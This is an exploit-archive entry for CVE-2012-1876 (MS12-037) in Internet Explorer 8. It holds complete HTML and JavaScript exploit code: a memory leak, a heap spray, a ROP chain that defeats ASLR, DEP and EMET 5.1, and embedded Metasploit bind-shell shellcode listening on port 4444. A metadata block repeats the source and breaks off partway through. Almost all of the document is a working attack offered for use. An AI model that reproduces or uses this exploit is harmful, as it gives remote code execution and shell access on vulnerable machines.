ID 1337DAY-ID-22895
Type zdt
Reporter ryujin
Modified 2014-11-18T00:00:00
Description
Exploit for windows platform in category remote exploits
<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass
** Exploit Coded by sickness || EMET 5.1 bypass by ryujin
** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}
function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2228408; // POP ECX
var rop = rop.toString(16);
var rop25 = rop.substring(4,8);
var rop26 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1586172; // POP EAX
var rop = rop.toString(16);
var rop27 = rop.substring(4,8);
var rop28 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16);
var rop29 = rop.substring(4,8);
var rop30 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16);
var rop31 = rop.substring(4,8);
var rop32 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16);
var rop33 = rop.substring(4,8);
var rop34 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16);
var rop35 = rop.substring(4,8);
var rop36 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
var rop = rop.toString(16);
var rop37 = rop.substring(4,8);
var rop38 = rop.substring(0,4); // } RET
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
var getmodulew = getmodulew.toString(16);
var getmodulew1 = getmodulew.substring(4,8);
var getmodulew2 = getmodulew.substring(0,4); // } RET
var rop = cbuttonlayout + 3621437; // MOV EAX,EDX
var rop = rop.toString(16);
var rop41 = rop.substring(4,8);
var rop42 = rop.substring(0,4); // } RET
var shellcode = unescape("%u4444");
while (shellcode.length < 100)
shellcode = shellcode + shellcode;
var shellcode = shellcode.substr(0, 46);
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
// EMET disable part 0x01 annihilate ROP protections
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u5f3c%u07d2"); // EMET_STRING_PTR (GetModuleHandle argument)
shellcode+= unescape("%u7372%u0006"); // Offset to "decoding helper" 0x67372
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of the "decoding helper")
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u5e84%u07d2"); // Set EBP to successfully return from the "decoding helper"
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN Call the "decoding helper"
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u"+rop41+"%u"+rop42); // MOV EAX,EDX # RETN
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI # RETN
shellcode+= unescape("%u5f38%u07d2"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on)
shellcode+= unescape("%u"+rop37+"%u"+rop38); // MOV DWORD PTR DS:[ESI],EAX
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u01b8%u0000"); // offset to NtProtectVirtualMemory unhooked
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%uffff%uffff"); // ProcessHandle
shellcode+= unescape("%u5f38%u07d2"); // *BaseAddress
shellcode+= unescape("%u5f34%u07d2"); // NumberOfBytesToProtect
shellcode+= unescape("%u0040%u0000"); // NewAccessProtection
shellcode+= unescape("%u5f30%u07d2"); // OldAccessProtection
shellcode+= unescape("%u5f38%u07d2"); // Reget pointer
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0558%u0000"); // Offset to EMET mitigations switch
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // NULL
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBX
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
// Store various pointers here
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u18eb"); // NOPs
shellcode+= unescape("%u4242%u4242"); // OldAccessProtection
shellcode+= unescape("%u0564%u0000"); // Size for NtVirtualProtectMemory
shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*
shellcode+= "EMET"; // EMET string
shellcode+= unescape("%u0000%u0000"); // EMET string
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// Store various pointers here
// EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread
// MOV EAX,DWORD PTR DS:[076D10BCH]
// MOV EAX,DWORD PTR DS:[007D25F48H]
// MOV ESI,DWORD PTR [EAX+518H]
// SUB ESP,2CCH
// MOV DWORD PTR [ESP],10010H
// MOV EDI,ESP
// MOV ECX,2CCH
// ADD EDI,4
// SUB ECX,4
// XOR EAX,EAX
// REP STOS BYTE PTR ES:[EDI]
// PUSH ESP
// PUSH 0FFFFFFFEH
// CALL ESI
shellcode+= unescape("%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec" +
"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
"%ufe6a%ud6ff");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end
// Bind shellcode on 4444 :)
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :)
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
// Total spray should be 1000
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);
shellcode+= padding;
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
function leak(){
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16);
//alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50);
}
function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1312272"; // 0x07D25E40
evil_col.span = "44";
}
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>
# 0day.today [2018-02-17] #
{"id": "1337DAY-ID-22895", "lastseen": "2018-02-17T19:29:43", "viewCount": 182, "bulletinFamily": "exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 2, "enchantments": {"score": {"value": 9.6, "vector": "NONE", "modified": "2018-02-17T19:29:43", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-1876"]}, {"type": "symantec", "idList": ["SMNTC-53848"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12404", "SECURITYVULNS:DOC:28204", "SECURITYVULNS:DOC:28155"]}, {"type": "exploitdb", "idList": ["EDB-ID:24017", "EDB-ID:20174", "EDB-ID:34815", "EDB-ID:33944", "EDB-ID:35273"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119467", "PACKETSTORM:115155", "PACKETSTORM:127316", "PACKETSTORM:128476"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS12_037_IE_COLSPAN"]}, {"type": "saint", "idList": ["SAINT:E0DB2F32D06502F92B8144DCC51213D4", "SAINT:625E0D0980997F6BFF377B9847205303", "SAINT:26F60ECC90154B838B0AF4C895DDCD0E"]}, {"type": "seebug", "idList": ["SSV:74062", "SSV:87111", "SSV:87309", "SSV:60566"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:87ECAF4F1FACB468F006F877AE38824E", "EXPLOITPACK:B3A5822873FF7E264F097AB7EE9F4396", "EXPLOITPACK:8D25D01AEAA652118123781053A4BDBA", "EXPLOITPACK:022449B08C2DE005F39553B5E709DE12"]}, {"type": "canvas", "idList": ["MS12_037"]}, {"type": "zdt", "idList": ["1337DAY-ID-22396"]}, {"type": "zdi", "idList": ["ZDI-12-093"]}, {"type": "threatpost", "idList": ["THREATPOST:0EF2611E64611F9EBB9DD054ABF7473B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902682", "OPENVAS:902682"]}, {"type": "mskb", "idList": ["KB2699988"]}, {"type": "nessus", "idList": ["SMB_NT_MS12-037.NASL"]}], "modified": "2018-02-17T19:29:43", "rev": 2}, "vulnersScore": 9.6}, "type": "zdt", "sourceHref": "https://0day.today/exploit/22895", "description": "Exploit for windows platform in category remote exploits", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)", "cvelist": ["CVE-2012-1876"], "sourceData": "<!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass\r\n** Exploit Coded by sickness || EMET 5.1 bypass by ryujin\r\n** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1\r\n-->\r\n \r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 3621437; // MOV EAX,EDX\r\n var rop = rop.toString(16);\r\n var rop41 = rop.substring(4,8);\r\n var rop42 = rop.substring(0,4); // } RET\r\n \r\n var shellcode = unescape(\"%u4444\");\r\n while (shellcode.length < 100)\r\n shellcode = shellcode + shellcode;\r\n var shellcode = shellcode.substr(0, 46);\r\n \r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01 annihilate ROP protections\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u5f3c%u07d2\"); // EMET_STRING_PTR (GetModuleHandle argument)\r\n shellcode+= unescape(\"%u7372%u0006\"); // Offset to \"decoding helper\" 0x67372\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of the \"decoding helper\")\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u5e84%u07d2\"); // Set EBP to successfully return from the \"decoding helper\"\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN Call the \"decoding helper\"\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\"); // Compensate for function epilogue\r\n shellcode+= unescape(\"%u\"+rop41+\"%u\"+rop42); // MOV EAX,EDX # RETN\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI # RETN\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on)\r\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u01b8%u0000\"); // offset to NtProtectVirtualMemory unhooked\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%uffff%uffff\"); // ProcessHandle\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // *BaseAddress\r\n shellcode+= unescape(\"%u5f34%u07d2\"); // NumberOfBytesToProtect\r\n shellcode+= unescape(\"%u0040%u0000\"); // NewAccessProtection\r\n shellcode+= unescape(\"%u5f30%u07d2\"); // OldAccessProtection\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // Reget pointer\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0558%u0000\"); // Offset to EMET mitigations switch\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBX\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n \r\n // Store various pointers here\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u18eb\"); // NOPs\r\n shellcode+= unescape(\"%u4242%u4242\"); // OldAccessProtection\r\n shellcode+= unescape(\"%u0564%u0000\"); // Size for NtVirtualProtectMemory\r\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= 